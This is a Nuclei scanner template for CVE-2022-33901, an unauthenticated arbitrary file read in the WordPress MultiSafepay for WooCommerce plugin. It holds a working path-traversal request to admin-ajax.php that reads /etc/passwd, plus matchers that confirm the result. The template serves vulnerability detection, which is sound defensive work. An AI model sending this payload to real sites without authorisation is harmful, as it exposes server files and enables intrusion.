nuclei-templates/http/cves/2022/CVE-2022-33901.yaml

47 lines
1.6 KiB
YAML

id: CVE-2022-33901
info:
name: WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read
author: theamanrawat
severity: high
description: |
WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wordpress.org/plugins/multisafepay/
- https://wordpress.org/plugins/multisafepay/#developers
- https://patchstack.com/database/vulnerability/multisafepay/wordpress-multisafepay-plugin-for-woocommerce-plugin-4-13-1-unauthenticated-arbitrary-file-read-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2022-33901
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-33901
cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:*:*:*
epss-score: 0.00698
metadata:
max-request: 1
verified: true
tags: cve,cve2022,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# Enhanced by md on 2023/03/22